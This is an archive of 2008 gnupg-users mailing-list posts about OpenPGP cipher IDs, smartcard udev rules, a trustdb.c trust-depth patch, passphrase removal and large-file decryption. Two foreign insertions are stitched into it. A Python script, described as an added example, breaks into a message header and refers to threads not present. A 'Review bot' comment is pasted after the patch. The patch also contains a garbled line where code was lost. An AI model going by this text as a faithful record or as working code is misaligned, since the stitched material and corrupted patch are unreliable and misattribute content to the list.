and why couldn't they just be added later in sequence after whatever the last accepted algorithm is?

vedaal

any ads or links below this message are added by hushmail without my endorsement or awareness of the nature of the link

From rjh at sixdemonbag.org Wed Jun 25 00:22:18 2008
From: rjh at sixdemonbag.org (Robert J. Hansen)
Date: Tue, 24 Jun 2008 17:22:18 -0500
Subject: cipher ID's
In-Reply-To: <20080624221035.DB80BD032F@mailserver10.hushmail.com>
References: <20080624221035.DB80BD032F@mailserver10.hushmail.com>
Message-ID: <4861739A.7000309@sixdemonbag.org>

vedaal at hush.com wrote:
> reserved for what?

Future use. Hate to give an answer that's so glib, but that's what it is. As of right now, I don't believe there's any consensus on what will ultimately go there, or if they will ever be used -- but the spec is including "room to grow", as it were, by telling every implementation author "don't use those codes for your own OpenPGP extensions, we may use them someday".

> and why couldn't they just be added later in sequence after whatever
> the last accepted algorithm is?

People add ciphers to the OpenPGP suite which are not explicitly included in the spec. E.g., Camellia right now, or the people who are experimenting around with ECDSA, or... etc.

If it was just "add it to the end", then every experimental OpenPGP platform out there would have problems. If S14 (to pick a random unused cipher number) is an experimental implementation of RC6, then what happens when AES-256.5 (a full 1.414 times stronger than AES256!) gets assigned to S14?

Fine, the experimental group moves up to S15. But all of the traffic they've already generated is still marked as S14. That means when they try to decrypt their traffic, they'll be decrypting it with AES-256.5 instead of RC6. Which means decryptions will fail. Which means ugly kluges will have to be written to handle this. And... etc., etc.

It's easier on everyone if it's done OpenPGP's way.

(Note -- while RC6 is a real algorithm, AES256.5 is not; it's firmly tongue in cheek.)

From michael at vorlon.ping.de Tue Jun 24 23:29:20 2008
From: michael at vorlon.ping.de (Michael Bienia)
Date: Tue, 24 Jun 2008 23:29:20 +0200
Subject: SCM SPR532 & Ubuntu 8.04 & GnuPG 1.4.6 versus GnuPG 2.0.7
In-Reply-To: <43cee7130805311039h738c4ea3x3b6e814ed2095ca7@mail.gmail.com>
References: <43cee7130805311039h738c4ea3x3b6e814ed2095ca7@mail.gmail.com>
Message-ID: <20080624212920.GA10462@vorlon.ping.de>

On 2008-05-31 19:39:18 +0200, Tobias Weisserth wrote:

Hello,

> I followed all the tutorials and howto documents I could and I managed to
> figure out that I had to tweak the USB driver bundle installation of the SCM
> driver to copy the bundle into the right directory for Ubuntu 8.04. After
> restarting pcscd I could use GnuPG 1.4.6 with the card.

I've a SCM SPR532 too, and it works without problems on Ubuntu 8.04. But I don't use pcscd, just plain gpg/gpg2 with gpg-agent to access it.

> So, after trying different things I managed to initialize my card and
> generate a new key using GnuPG 1.4.6 (current Ubuntu stable package).
>
> However, GnuPG 2.0.7 (Ubuntu 8.04 package) will not read the card like GnuPG
> 1.4.6. When I do a

Have you tried to use the card reader with gpg only (no pcscd)? You need to get udev to create the device nodes with the correct permission to use the card reader as a user. I attached my udev rules. Put that file into /etc/udev/rules.d, create the "scard" group, add your user to it (don't forget to re-login) and restart udev. Don't forget to stop pcscd. (Note to self: I should get this bug finally fixed for Ubuntu intrepid).

You should be able to access the card reader through gpg with and without gpg-agent.

> I would also like to know how the whole setup is integrated with graphical
> clients in Ubuntu 8.04, for example Evolution, Seahorse and such.

I use pinentry-gtk2 to get told when I should enter the pin. As I don't use Evolution or Seahorse, I don't know how to best integrate with it. I know that Seahorse has its own gpg-agent, but I don't know how well Seahorse works with the original gpg-agent or if the seahorse-agent can access the card reader. When you test with gpg-agent make sure that you use the one provided from gpg2.

Regards,
Michael

-------------- next part --------------
ACTION!="add", GOTO="gnupg-ccid_rules_end"

# USB SmartCard Readers
## SCM readers (SCR335, SPR532, & Co)
SUBSYSTEM=="usb", ATTRS{idVendor}=="04e6", ATTRS{idProduct}=="e001", GROUP="scard", MODE="0660"
SUBSYSTEM=="usb", ATTRS{idVendor}=="04e6", ATTRS{idProduct}=="e003", GROUP="scard", MODE="0660"
SUBSYSTEM=="usb", ATTRS{idVendor}=="04e6", ATTRS{idProduct}=="5115", GROUP="scard", MODE="0660"

# PCMCIA SmartCard Readers
## Omnikey CardMan 4040
SUBSYSTEM=="cardman_4040", GROUP="scard", MODE="0660"

LABEL="gnupg-ccid_rules_end"

From jmoore3rd at bellsouth.net Wed Jun 25 01:22:50 2008
From: jmoore3rd at bellsouth.net (John W. Moore III)
Date: Tue, 24 Jun 2008 19:22:50 -0400
Subject: cipher ID's
In-Reply-To: <4861739A.7000309@sixdemonbag.org>
References: <20080624221035.DB80BD032F@mailserver10.hushmail.com> <4861739A.7000309@sixdemonbag.org>
Message-ID: <486181CA.2080409@bellsouth.net>

Robert J. Hansen wrote:

> People add ciphers to the OpenPGP suite which are not explicitly
> included in the spec. E.g., Camellia right now, or the people who are
> experimenting around with ECDSA, or... etc.
>
> If it was just "add it to the end", then every experimental OpenPGP
> platform out there would have problems. If S14 (to pick a random unused
> cipher number) is an experimental implementation of RC6, then what
> happens when AES-256.5 (a full 1.414 times stronger than AES256!) gets
> assigned to S14?
>
> Fine, the experimental group moves up to S15. But all of the traffic
> they've already generated is still marked as S14. That means when they
> try to decrypt their traffic, they'll be decrypting it with AES-256.5
> instead of RC6. Which means decryptions will fail. Which means ugly
> kluges will have to be written to handle this. And... etc., etc.
>
> It's easier on everyone if it's done OpenPGP's way.

Most Excellent Answer!

FWIW; the 'Working Group' is still mulling the inclusion of OID as part of ECC. Who knows what, if anything, will be assigned to these identifiers. If One follows the 'David Shaw' proposals for Camellia algorithm it will be found that the identify nomenclature changed several times. It still isn't 'final adopted' and may change again.

I Love the "Hansen/Clizbe" Warning; if Ya follow the /Bleeding Edge/ and things get broken You 'own' all the pieces!

JOHN ;)
Timestamp: Tuesday 24 Jun 2008, 19:21 --400 (Eastern Daylight Time)

From dshaw at jabberwocky.com Wed Jun 25 01:36:54 2008
From: dshaw at jabberwocky.com (David Shaw)
Date: Tue, 24 Jun 2008 19:36:54 -0400
Subject: cipher ID's
In-Reply-To: <20080624221035.DB80BD032F@mailserver10.hushmail.com>
References: <20080624221035.DB80BD032F@mailserver10.hushmail.com>
Message-ID: <0D281235-A570-4576-935F-7E7610A30293@jabberwocky.com>

On Jun 24, 2008, at 6:10 PM, vedaal at hush.com wrote:

> just curious // ? O.T.
>
> gnupg lists the following cipher ID's for symmetric algorithms:
>
> Home: ~/.gnupg
> Supported algorithms:
> Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA
> Cipher: IDEA (S1), 3DES (S2), CAST5 (S3), BLOWFISH (S4), AES (S7),
> AES192 (S8), AES256 (S9), TWOFISH (S10)
>
>
> rfc-4880 section 9.2
> lists (S5) and (S6) as "Reserved"
> http://tools.ietf.org/html/rfc4880#section-9
>
> reserved for what?
> and why couldn't they just be added later in sequence after whatever the
> last accepted algorithm is?

They could have been. In the case of S5 and S6, they're marked as reserved because they were actually allocated at one point for SAFER-SK128 (S5) and DES/SK (S6). They're marked as reserved now to make sure they're not used by anyone for anything.

David

From david at coffeefish.org Wed Jun 25 04:55:26 2008
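The name/code equivalence, the "unsupported code" warning and the 3DES fallback discussed in the two threads above, as an added example that is not part of any post and is not GnuPG's code: it parses the `gpg -v --version` listings posted here, resolves the quoted gpg.conf lines against them, and models the described fallback in simplified form. The function names and the recipient lists are hypothetical.

```python
"""Resolve gpg.conf preference tokens against `gpg -v --version` listings."""
import re

# Algorithm listings as posted in this thread (re-wrapped): one build without
# Camellia (cipher line only) and one svn build that includes it.
BUILD_NO_CAMELLIA = """\
Cipher: IDEA (S1), 3DES (S2), CAST5 (S3), BLOWFISH (S4), AES (S7),
        AES192 (S8), AES256 (S9), TWOFISH (S10)
"""
BUILD_WITH_CAMELLIA = """\
Cipher: IDEA (S1), 3DES (S2), CAST5 (S3), BLOWFISH (S4), AES (S7),
        AES192 (S8), AES256 (S9), TWOFISH (S10), CAMELLIA128 (S11),
        CAMELLIA192 (S12), CAMELLIA256 (S13)
Hash: MD5 (H1), SHA1 (H2), RIPEMD160 (H3), SHA256 (H8), SHA384 (H9),
      SHA512 (H10), SHA224 (H11)
Compression: Uncompressed (Z0), ZIP (Z1), ZLIB (Z2), BZIP2 (Z3)
"""

# "NAME (Xn)" pairs; S = cipher, H = hash (digest), Z = compression.
PAIR = re.compile(r"([A-Za-z0-9]+) \(([SHZ]\d+)\)")


def parse_supported(version_text):
    """Return a lookup that maps both 'S9' and 'AES256' to 'AES256'."""
    table = {}
    for name, code in PAIR.findall(version_text):
        canonical = name.upper()
        table[code] = canonical
        table[canonical] = canonical
    return table


def resolve_line(conf_line, table):
    """Split a gpg.conf preference line into (option, names, unsupported).

    Tokens may be names (aes256) or codes (S9); anything this build does
    not list is returned in `unsupported` instead of being silently dropped.
    """
    option, *tokens = conf_line.split()
    names, unsupported = [], []
    for token in tokens:
        name = table.get(token.upper())
        if name is None:
            unsupported.append(token)
        else:
            names.append(name)
    return option, names, unsupported


def choose_cipher(personal, recipients):
    """Simplified model of the fallback described in the thread.

    Take the first personal preference that every recipient's key
    advertises; if none qualifies, the result is 3DES, which OpenPGP
    treats as tacitly present in every preference list.
    """
    for name in personal:
        if name == "3DES" or all(name in prefs for prefs in recipients):
            return name
    return "3DES"


if __name__ == "__main__":
    plain = parse_supported(BUILD_NO_CAMELLIA)
    line = "personal-cipher-preferences S9 S2 S13 S10 S4 S12 S8 S11 S7 S3 S1"
    print(resolve_line(line, plain))
    # Constructed recipients: one modern key, one that only advertises CAST5.
    print(choose_cipher(["AES256", "TWOFISH"], [["AES256", "CAST5"], ["CAST5"]]))
```

Running a preference line through `resolve_line` before putting it in gpg.conf shows which codes the local build does not list, which is the failure the quoted warning is about.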
From: david at coffeefish.org (David Koppenhofer)
Date: Tue, 24 Jun 2008 22:55:26 -0400
Subject: Multiple uid's vs. multiple primary keys & "master signing keys"
In-Reply-To: <20080623202353.GF39571@jabberwocky.com>
References: <20080623202353.GF39571@jabberwocky.com>
Message-ID:

On Mon, Jun 23, 2008 at 4:23 PM, David Shaw wrote:
> On Mon, Jun 23, 2008 at 03:28:44PM -0400, David Koppenhofer wrote:
>> Hi everyone,
>>
>> I'm a potential new gpg user, and have been struggling with a few
>> questions about how uid's and keys should be configured.e.
>> ...
>
> It's handy to make a distinction between your work and personal life,
> and for many or even most people, their personal "identity" is a lot
> longer lived than their work "identity". People keep the same
> personal address for years, but don't as often keep the same job (and
> thus job address) for that long.
>
> Personally, I do this with two keys. One personal, and one work. I
> don't really get the work one signed, as people who want to reach me
> generally do so in my personal context (I do FOSS work, but I do it
> under my personal address as I've found that many people just send
> mail to personal addresses even there is a special address for FOSS
> stuff).

Thanks for the quick and helpful reply. It's good to know that I wasn't out in left field with my understanding of gnupg. :-) Now, I can make some decisions on how to proceed.

David

From david at coffeefish.org Wed Jun 25 05:03:51 2008
From: david at coffeefish.org (David Koppenhofer)
Date: Tue, 24 Jun 2008 23:03:51 -0400
Subject: Multiple uid's vs. multiple primary keys & "master signing keys"
In-Reply-To: <48606A54.1020104@gmail.com>
References: <48606A54.1020104@gmail.com>
Message-ID:

On Mon, Jun 23, 2008 at 11:30 PM, Faramir wrote:
> I heard, a couple of weeks ago, about somebody who lost all her email
> accounts because her primary email address was hacked. The hacker knew
> the other email addresses, used the option "I forgot my password, send
> it to my secondary email", and all the other email accounts sent their
> passwords to the email that was compromised... allowing the hacker to
> take control of all these accounts, changing the security questions and
> secondary emails, so the true owner can't recover the accounts.

The thought of 'tying' my email accounts together through "I forgot my password, send to my secondary email" has given me pause in the past.

I don't think any of my email accounts are currently set up with another as a "secondary" email; password recovery is usually through other means (e.g. security questions).

Thanks for sharing your thoughts about this.

David

From faramir.cl at gmail.com Wed Jun 25 11:45:57 2008
From: faramir.cl at gmail.com (Faramir)
Date: Wed, 25 Jun 2008 05:45:57 -0400
Subject: Multiple uid's vs. multiple primary keys & "master signing keys"
In-Reply-To:
References: <48606A54.1020104@gmail.com>
Message-ID: <486213D5.80402@gmail.com>

David Koppenhofer wrote:
> On Mon, Jun 23, 2008 at 11:30 PM, Faramir wrote:
>> I heard, a couple of weeks ago, about somebody who lost all her email
>> accounts because her primary email address was hacked. The hacker knew
>> the other email addresses, used the option "I forgot my password, send
>> it to my secondary email", and all the other email accounts sent their
>> passwords to the email that was compromised... allowing the hacker to
>> take control of all these accounts, changing the security questions and
>> secondary emails, so the true owner can't recover the accounts.
>
> The thought of 'tying' my email accounts together through "I forgot my
> password, send to my secondary email" has given me pause in the past.
>
> I don't think any of my email accounts are currently set up with
> another as a "secondary" email; password recovery is usually through
> other means (e.g. security questions).
>
> Thanks for sharing your thoughts about this.

Security questions are fine, but, as an example, gmail only allow to use that option after several days have passed since the last user login. But sending the new pass to a secondary email account is always ready. Also, if I am not wrong, at the time when you needed an invitation to make a gmail account, if you invited yourself, the new account had the secondary email account set by default...

Now I created a "secret" account, and bound my emails to that one... it is not in any of my address books, and there will never be a message sent from that address... I hope that would be secure enough...

I know this is a bit off-topic, but since gnupg is focused on privacy and security... and this relates to multiple UIDs bound to the same key.

Best Regards

From david at coffeefish.org Wed Jun 25 14:20:15 2008
From: david at coffeefish.org (David Koppenhofer)
Date: Wed, 25 Jun 2008 08:20:15 -0400
Subject: Multiple uid's vs. multiple primary keys & "master signing keys"
In-Reply-To: <486213D5.80402@gmail.com>
References: <48606A54.1020104@gmail.com> <486213D5.80402@gmail.com>
Message-ID:

On Wed, Jun 25, 2008 at 5:45 AM, Faramir wrote:
> David Koppenhofer wrote:
>> I don't think any of my email accounts are currently set up with
>> another as a "secondary" email; password recovery is usually through
>> other means (e.g. security questions).
>
> Security questions are fine, but, as an example, gmail only allow to
> use that option after several days have passed since the last user
> login. But sending the new pass to a secondary email account is always
> ready. Also, if I am not wrong, at the time when you needed an
> invitation to make a gmail account, if you invited yourself, the new
> account had the secondary email account set by default...
>
> Now I created a "secret" account, and bound my emails to that one...
> it is not in any of my address books, and there will never be a message
> sent from that address... I hope that would be secure enough...
>
> I know this is a bit off-topic, but since gnupg is focused on privacy
> and security... and this relates to multiple UIDs bound to the same key.

I checked several of my email accounts, and a few do use a secondary email address (like gmail). There are also all my non-email web accounts that are associated with an email address, but I'm not quite as concerned about those since those wouldn't show up in UIDs. (though they are vulnerable if my email account is cracked)

It just goes to show that you need to pick a good pass[word|phrase], especially for your main email account, and hope that the administrator had made it resistant to cracking attempts.

Sorry if this drifted too far OT for the list...

David

From dshaw at jabberwocky.com Thu Jun 26 20:54:14 2008
From: dshaw at jabberwocky.com (David Shaw) Date: Thu, 26 Jun 2008 14:54:14 -0400 Subject: Questions about trust signatures In-Reply-To: <20080616210212.GB14148@jabberwocky.com> References: <17789248.post@talk.nabble.com> <20080613214255.GD4107@jabberwocky.com> <17872484.post@talk.nabble.com> <20080616210212.GB14148@jabberwocky.com> Message-ID: <20080626185413.GA2349@jabberwocky.com> On Mon, Jun 16, 2008 at 05:02:12PM -0400, David Shaw wrote: > Interesting. I'm going to have to go back to my notes from when I > wrote that code back in 2002, and see what I was shooting for. My > memory is that I wanted the trust depth to automatically degrade as > the chain continued. It's possible this is just a bug, or it is > possible I did it this way on purpose (PGP compatibility, maybe?) After some digging: GPG's trust signature implementation was based on, and tested against PGP 7 (as a black box - we didn't see any of the code). My best guess is this is what PGP 7 did at the time? I don't really recall, and don't have a copy to test against any longer. In any event, PGP 9 does lower the trust depth as the chain gets longer, so I will update the calculations to match that. Here is a patch. Can you give it a try and see if it works as expected for you? David -------------- next part -------------- Index: trustdb.c =================================================================== --- trustdb.c (revision 4795) +++ trustdb.c (working copy) 
@@ -1933,50 +1933,72 @@ (uidnode && check_regexp(kr->trust_regexp, uidnode->pkt->pkt.user_id->name)))) { - if(DBG_TRUST && opt.trust_model==TM_PGP && sig->trust_depth) - log_debug("trust sig on %s, sig depth is %d, kr depth is %d\n", - uidnode->pkt->pkt.user_id->name,sig->trust_depth, - kr->trust_depth); - /* Are we part of a trust sig chain? We always favor the latest trust sig, rather than the greater or lesser trust sig or value. I could make a decent argument for any of these cases, but this seems to be what PGP does, and I'd like to be compatible. -dms */ - if(opt.trust_model==TM_PGP && sig->trust_depth - && pk->trust_timestamp<=sig->timestamp - && (sig->trust_depth<=kr->trust_depth - || kr->ownertrust==TRUST_ULTIMATE)) + if(opt.trust_model==TM_PGP + && sig->trust_depth + && pk->trust_timestamp<=sig->timestamp) { - /* If we got here, we know that: + byte depth; - this is a trust sig. + /* If the depth on the signature is less than the + chain currently has, then use the signature depth + so we don't increase the depth beyond what the + signer wanted. If the depth on the signature is + more than the chain currently has, then use the + chain depth so we use as much of the signature + depth as the chain will permit. An ultimately + trusted signature can restart the depth to + whatever level it likes. */ - it's a newer trust sig than any previous trust - sig on this key (not uid). + if(sig->trust_depthtrust_depth + || kr->ownertrust==TRUST_ULTIMATE) + depth=sig->trust_depth; + else + depth=kr->trust_depth; - it is legal in that it was either generated by an - ultimate key, or a key that was part of a trust - chain, and the depth does not violate the - original trust sig. + if(depth) + { + if(DBG_TRUST) + log_debug("trust sig on %s, sig depth is %d," + " kr depth is %d\n", + uidnode->pkt->pkt.user_id->name, + sig->trust_depth, + kr->trust_depth); - if there is a regexp attached, it matched - successfully. 
- */ + /* If we got here, we know that: - if(DBG_TRUST) - log_debug("replacing trust value %d with %d and " - "depth %d with %d\n", - pk->trust_value,sig->trust_value, - pk->trust_depth,sig->trust_depth); + this is a trust sig. - pk->trust_value=sig->trust_value; - pk->trust_depth=sig->trust_depth-1; + it's a newer trust sig than any previous trust + sig on this key (not uid). - /* If the trust sig contains a regexp, record it - on the pk for the next round. */ - if(sig->trust_regexp) - pk->trust_regexp=sig->trust_regexp; + it is legal in that it was either generated by an + ultimate key, or a key that was part of a trust + chain, and the depth does not violate the + original trust sig. + + if there is a regexp attached, it matched + successfully. + */ + + if(DBG_TRUST) + log_debug("replacing trust value %d with %d and " + "depth %d with %d\n", + pk->trust_value,sig->trust_value, + pk->trust_depth,depth); + + pk->trust_value=sig->trust_value; + pk->trust_depth=depth-1; + + /* If the trust sig contains a regexp, record it + on the pk for the next round. */ + if(sig->trust_regexp) + pk->trust_regexp=sig->trust_regexp; + } } if (kr->ownertrust == TRUST_ULTIMATE) From naeem.m.afzal at intel.com Sat Jun 28 04:04:24 2008 
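Review bot: inside the new `if(depth)` block, the second `log_debug` reports `depth` as the replacement depth, but the assignment right after it stores `depth-1` in `pk->trust_depth`, so the debug output is one higher than the value that ends up on the key; logging `depth-1` (or rewording the message to say it is the depth before decrementing) would keep the trace consistent with the state. Two smaller points in the same block: when `depth` works out to 0 the trust signature is skipped without any DBG_TRUST output, so a short message in that case would make an exhausted chain visible when debugging; and the retained comment line "the depth does not violate the original trust sig" now holds only because the depth is clamped to `kr->trust_depth` rather than because deeper signatures are rejected, which the comment should say.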
From: naeem.m.afzal at intel.com (Afzal, Naeem M)
Date: Fri, 27 Jun 2008 19:04:24 -0700
Subject: why we need passphrase
Message-ID: <821A1558D8819A4BB700FFF265F6781F0646C07C@orsmsx505.amr.corp.intel.com>

Hi,

In order to understand GnuPG, I tried to create private keys on two ubuntu systems. Here are my steps and I would ask my question at the end as I need to show what I did.

1. System A: Created private and public key by using 'gpg --gen-key' and then
'gpg --export --armor -out userA.asc -r 'USER A'

2. System B: Created private and public key by using 'gpg --gen-key' and then imported public key of userA
'gpg --import userA.asc'

3. System B: encrypted a file for userA using userA's public key '
gpg -o file_from_userB -r userA --encrypt file_to_encrypt

4. System A: Tried to decrypt file_from_userB
gpg -o decrypted_file --decrypt file_from_userB
at this point, it asks to provide passphrase of userA. Is it possible to avoid where I need to provide passphrase at all? My understanding was that the file was encrypted with userA's credential to begin with, and userA should be decrypt it without providing any passphrase? How can do this procedure where I don't have to provide passphrase in decryption?

Thanks a lot.
Naeem

From faramir.cl at gmail.com Sat Jun 28 20:08:12 2008
From: faramir.cl at gmail.com (Faramir)
Date: Sat, 28 Jun 2008 14:08:12 -0400
Subject: why we need passphrase
In-Reply-To: <821A1558D8819A4BB700FFF265F6781F0646C07C@orsmsx505.amr.corp.intel.com>
References: <821A1558D8819A4BB700FFF265F6781F0646C07C@orsmsx505.amr.corp.intel.com>
Message-ID: <48667E0C.104@gmail.com>

Afzal, Naeem M wrote:
> Hi,
>
> In order to understand GnuPG, I tried to create private keys on two ubuntu systems. Here are my steps and I would ask my question at the end as I need to show what I did.
>
> 1. System A: Created private and public key by using 'gpg --gen-key' and then
> 'gpg --export --armor -out userA.asc -r 'USER A'
>
> 2. System B: Created private and public key by using 'gpg --gen-key' and then imported public key of userA
> 'gpg --import userA.asc'
>
> 3. System B: encrypted a file for userA using userA's public key '
> gpg -o file_from_userB -r userA --encrypt file_to_encrypt
>
> 4. System A: Tried to decrypt file_from_userB
> gpg -o decrypted_file --decrypt file_from_userB
> at this point, it asks to provide passphrase of userA. Is it possible to avoid where I need to provide passphrase at all? My understanding was that the file was encrypted with userA's credential to begin with, and userA should be decrypt it without providing any passphrase? How can do this procedure where I don't have to provide passphrase in decryption?

Because the key itself is protected by a passphrase. You CAN remove that protection, and you can even generate keys without passphrase.. but the idea is, if you have to go to the bathroom, and someone else tries to read your messages, or steal your key... the thief won't have much luck, since if the passphrase is strong, he won't be able to activate the key... unless the thief is lucky enough to "guess" the passphrase hitting the keyboard randomly...

A good passphrase would make bruteforce attack infeasible, it won't be in any dictionary (so dictionary attacks won't work)... so, if you remove the passphrase, you'll want to take extra measures to avoid problems... but maybe you know nobody is going to touch your computer...

Regards

From faramir.cl at gmail.com Sat Jun 28 19:58:44 2008
From: faramir.cl at gmail.com (Faramir)
Date: Sat, 28 Jun 2008 13:58:44 -0400
Subject: A small question about GnuPG 2
Message-ID: <48667BD4.7090703@gmail.com>

Well, as far as I know, it adds support for s/MIME... and if I am not wrong, that would mean certificates like the ones issued by CAcert, Comodo, et al... But, is GnuPG capable of generating those certificates? Or we will still require OpenSSL or equivalent to make them?

Regards

From naeem.m.afzal at intel.com Sun Jun 29 00:13:04 2008
From: naeem.m.afzal at intel.com (Afzal, Naeem M)
Date: Sat, 28 Jun 2008 15:13:04 -0700
Subject: why we need passphrase
In-Reply-To: <48667E0C.104@gmail.com>
References: <821A1558D8819A4BB700FFF265F6781F0646C07C@orsmsx505.amr.corp.intel.com> <48667E0C.104@gmail.com>
Message-ID: <821A1558D8819A4BB700FFF265F6781F0646C102@orsmsx505.amr.corp.intel.com>

How can I remove this restriction where I don't have to provide passphrase and public key itself is good enough?

Thanks
naeem

>-----Original Message-----
>From: gnupg-users-bounces at gnupg.org [mailto:gnupg-users-bounces at gnupg.org]
>On Behalf Of Faramir
>Sent: Saturday, June 28, 2008 11:08 AM
>To: gnupg-users at gnupg.org
>Subject: Re: why we need passphrase
>
> Because the key itself is protected by a passphrase. You CAN remove
>that protection, and you can even generate keys without passphrase.. but
>the idea is, if you have to go to the bathroom, and someone else tries
>to read your messages, or steal your key... the thief won't have much
>luck, since if the passphrase is strong, he won't be able to activate the
>key... unless the thief is lucky enough to "guess" the passphrase
>hitting the keyboard randomly...
>
> A good passphrase would make bruteforce attack infeasible, it won't be
>in any dictionary (so dictionary attacks won't work)... so, if you
>remove the passphrase, you'll want to take extra measures to avoid
>problems... but maybe you know nobody is going to touch your computer...
>

From faramir.cl at gmail.com Sun Jun 29 05:29:00 2008
From: faramir.cl at gmail.com (Faramir)
Date: Sat, 28 Jun 2008 23:29:00 -0400
Subject: why we need passphrase
In-Reply-To: <821A1558D8819A4BB700FFF265F6781F0646C102@orsmsx505.amr.corp.intel.com>
References: <821A1558D8819A4BB700FFF265F6781F0646C07C@orsmsx505.amr.corp.intel.com> <48667E0C.104@gmail.com> <821A1558D8819A4BB700FFF265F6781F0646C102@orsmsx505.amr.corp.intel.com>
Message-ID: <4867017C.5070403@gmail.com>

Afzal, Naeem M wrote:
> How can I remove this restriction where I don't have to provide passphrase and public key itself is good enough?

The public key is never protected by the passphrase ( *as far as I know* I may be wrong), so anyway it should be safe to upload it.

To remove the passphrase... _I think_ the command is:

gpg --edit-key 12WP8CAQ (12WP8CAQ must be replaced by your key's ID) (enter)
passwd (enter)

then it should ask for your passphrase, and then ask you to enter the new passphrase (it asks for it 2 times, as usual, to be sure you are not mistyping it)

I figure if you don't hit any key, and answer by hitting "enter", it should assume you want a blank passphrase... But don't believe too much, I seldom use the command line with gpg (I manage my keys from GPGkeys or Enigmail), and certainly, I have never removed a passphrase... There are expert people in this list (actually, developers), advanced users, and I am just a new user, so I still have a lot to learn about this.

Best Regards

P.S: always back up your key, or at least, make a revocation certificate... just in case you need to revoke it and make a new one...

>> -----Original Message-----
>> From: gnupg-users-bounces at gnupg.org [mailto:gnupg-users-bounces at gnupg.org]
>> On Behalf Of Faramir
>> Sent: Saturday, June 28, 2008 11:08 AM
>> To: gnupg-users at gnupg.org
>> Subject: Re: why we need passphrase
>>
>> Because the key itself is protected by a passphrase. You CAN remove
>> that protection, and you can even generate keys without passphrase.. but
>> the idea is, if you have to go to the bathroom, and someone else tries
>> to read your messages, or steal your key... the thief won't have much
>> luck, since if the passphrase is strong, he won't be able to activate the
>> key... unless the thief is lucky enough to "guess" the passphrase
>> hitting the keyboard randomly...
....

From faramir.cl at gmail.com Sun Jun 29 05:34:54 2008
From: faramir.cl at gmail.com (Faramir)
Date: Sat, 28 Jun 2008 23:34:54 -0400
Subject: why we need passphrase (I forgot something important in the prev procedure)
In-Reply-To: <821A1558D8819A4BB700FFF265F6781F0646C102@orsmsx505.amr.corp.intel.com>
References: <821A1558D8819A4BB700FFF265F6781F0646C07C@orsmsx505.amr.corp.intel.com> <48667E0C.104@gmail.com> <821A1558D8819A4BB700FFF265F6781F0646C102@orsmsx505.amr.corp.intel.com>
Message-ID: <486702DE.8060300@gmail.com>

Afzal, Naeem M wrote:
> How can I remove this restriction where I don't have to provide passphrase and public key itself is good enough?
>
> Thanks
> naeem

I forgot a very important thing: after changing your passphrase, probably you will have to give gpg the "save" command in order to actually make the changes.... or maybe in this case, it is not needed... but if you notice gpg is still waiting for you to do something.. probably it is waiting for the save command.

Regards

From kloecker at kde.org Sun Jun 29 12:10:17 2008
From: kloecker at kde.org (Ingo Klöcker)
Date: Sun, 29 Jun 2008 12:10:17 +0200
Subject: A small question about GnuPG 2
In-Reply-To: <48667BD4.7090703@gmail.com>
References: <48667BD4.7090703@gmail.com>
Message-ID: <200806291210.18180@erwin.ingo-kloecker.de>

On Saturday 28 June 2008, Faramir wrote:
> Well, as far as I know, it adds support for S/MIME... and if I am not
> wrong, that would mean certificates like the ones issued by CAcert,
> Comodo, et al... But, is GnuPG capable of generating those
> certificates? Or will we still require OpenSSL or equivalent to make
> them?

GnuPG 2 includes a script called gpgsm-gencert.sh that can be used to generate an X.509 certificate request. I don't think gpgsm can be used to generate certificates; from gpgsm's man page:

=====
--gen-key
    This command will only print an error message and direct the user to the gpgsm-gencert.sh script.
=====

Regards,
Ingo

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 194 bytes
Desc: This is a digitally signed message part.
URL:

From ajay.madamala at gmail.com Sun Jun 29 13:12:00 2008
From: ajay.madamala at gmail.com (ajay Madamala)
Date: Sun, 29 Jun 2008 16:42:00 +0530
Subject: Problem in case decrypting large file size
Message-ID: <5fb810f80806290412r4b443774tbf7e1fdff8cba3aa@mail.gmail.com>

Hello all

Currently we are working on GPG implementation in project with Java integration. GPG commands will be called by Java code at runtime. However, we were not able to test decryption via java code if source file was >2kb size.. Please advise me how to overcome this case... Inputs are more helpful...

Thanks

-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From roam at ringlet.net Mon Jun 30 12:56:48 2008
From: roam at ringlet.net (Peter Pentchev)
Date: Mon, 30 Jun 2008 13:56:48 +0300
Subject: Problem in case decrypting large file size
In-Reply-To: <5fb810f80806290412r4b443774tbf7e1fdff8cba3aa@mail.gmail.com>
References: <5fb810f80806290412r4b443774tbf7e1fdff8cba3aa@mail.gmail.com>
Message-ID: <20080630105648.GA1092@straylight.m.ringlet.net>

On Sun, Jun 29, 2008 at 04:42:00PM +0530, ajay Madamala wrote:
> Hello all
>
> Currently we are working on GPG implementation in project with Java
> integration. GPG commands will be called by Java code at runtime. However, we
> were not able to test decryption via java code if source file was >2kb
> size.. Please advise me how to overcome this case... Inputs are more
> helpful...

Assuming you meant two *giga*bytes, not two kilobytes, I think the most common work-around is to pass the encrypted data on gpg's standard input and read the decrypted data from its standard output. That is, instead of doing something like:

  gpg -d file.txt.enc

and expecting to get a file.txt after a successful decryption, do this:

  gpg -d < file.txt.enc > file.txt

Of course, the exact invocation depends on your programming language, libraries and stuff (you may invoke a shell and pass it this command with the redirections, or you may fork off a process and reopen its file descriptors 0 and 1, or...), but that's the general idea.

Hope that helps.

G'luck,
Peter

--
Peter Pentchev roam at ringlet.net roam at cnsys.bg roam at FreeBSD.org
PGP key: http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553
This sentence claims to be an Epimenides paradox, but it is lying.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 195 bytes
Desc: not available
URL:

From josh.cepek at usa.net Mon Jun 30 19:13:30 2008
From: josh.cepek at usa.net (Josh Cepek)
Date: Mon, 30 Jun 2008 12:13:30 -0500
Subject: Multiple uid's vs. multiple primary keys & "master signing keys"
In-Reply-To:
References:
Message-ID: <4869143A.7010003@usa.net>

David Koppenhofer wrote:
> 1) Multiple uid's (emails) per primary key versus multiple primary keys
> I have 3 email addresses I currently use: one personal, one for foss
> development, and one for work. I could create 3 uid's associated with
> the same primary key (option A), or 3 separate primary keys with 1 uid
> each (option B).
> [.. cut ..]
> * Option A has 1 encryption key, B has 3. In the 3-key scenario, if
> I'm forced to reveal encrypted messages to one of the addresses, the
> others are not automatically compromised.

